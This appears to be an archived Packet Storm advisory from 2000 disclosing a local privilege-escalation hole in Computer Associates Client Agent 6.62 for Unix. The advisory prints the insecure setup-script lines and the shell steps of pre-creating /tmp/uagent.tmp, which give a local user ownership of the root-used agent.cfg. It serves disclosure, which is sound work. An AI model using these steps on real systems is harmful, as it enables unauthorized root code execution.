Type packetstorm
Reporter Zorgon
Modified 2000-08-31T00:00:00


                                            `Client Agent 6.62 for Unix Vulnerability  
Tested on a Debian 2.2.14  
Client Agent has a hole allowing to execute an arbitrary code by root  
without its knowing. In the meantime, some conditions are necessary to  
exploit this vulnerability.  
Client Agent is used with ARCserveIT, the safe software. It must be installed  
on all the workstations. A global configuration file agent.cfg keep every  
sub-agents installed on your system. This file is in /usr/CYEagent, and receive  
the information from the sub-agent when the script /opt/uagent/uagensetup is run.  
debian:/usr/CYEagent# more agent.cfg  
#(c) Copyright 1989-1999 Computer Associates International, Inc.  
#and/or its subsidiaries. All Rights Reserved. Use by the United  
#States Government is subject to RESTRICTED RIGHTS as set out in  
#the license agreement.  
NAME Uagent  
VERSION 5.0.0  
HOME /opt/uagent  
ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH  
ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH  
ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH  
BROWSER asbr  
AGENT uagentd  
MERGE umrgd  
VERIFY umrgd  
where asbr, uagentd, and umgrd are programms in /opt/uagent  
Client Agent is vulnerable only if uagentsetup is run a second time. The first time,  
it creates the folder /usr/CYEagent and the file agent.cfg, but after it creates  
a backup of agent.cfg and creates a new agent.cfg without checking permissions.  
The code in /opt/uagent/uagentsetup :  
# append lines  
case $ANS in  
cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2  
${ECHO} >> ${TMPFILE} || exit 2  
mv ${TMPFILE} $dest || exit 2 <------------  
So anyone can control this file. The modifications to this file will be used when  
the sub-agent will be stopped and restarted.  
[zorgon@debian /]$ cd /tmp  
[zorgon@debian /tmp]$ touch uagent.tmp  
[zorgon@debian /tmp]$ chmod 700 uagent.tmp  
If uagentsetup is run a second time :  
[zorgon@debian /]$ ls -lag /usr/CYEagent/  
total 176  
drwxr-xr-x 3 root root 4096 Jul 19 17:46 .  
drwxr-xr-x 15 root root 4096 Jul 11 10:37 ..  
-rw-r--r-- 1 zorgon users 618 Jul 19 17:47 agent.cfg  
-rw-r--r-- 1 root root 618 Jul 19 17:47 agent.cfg.old  
-rwxr-xr-x 1 root root 16899 Jul 11 10:37 asagent  
-rwxr-xr-x 1 root root 105280 Jul 11 10:37 asagentd  
lrwxrwxrwx 1 root root 11 Jul 12 10:54 li -> /usr/lib/li  
-rwxr-xr-x 1 root root 27878 Jul 19 17:47  
drwxr-xr-x 3 root root 4096 Jul 11 10:37 nls  
[zorgon@debian /]$  
zorgon <>  
Do you do Linux? :)   
Get your FREE email address at: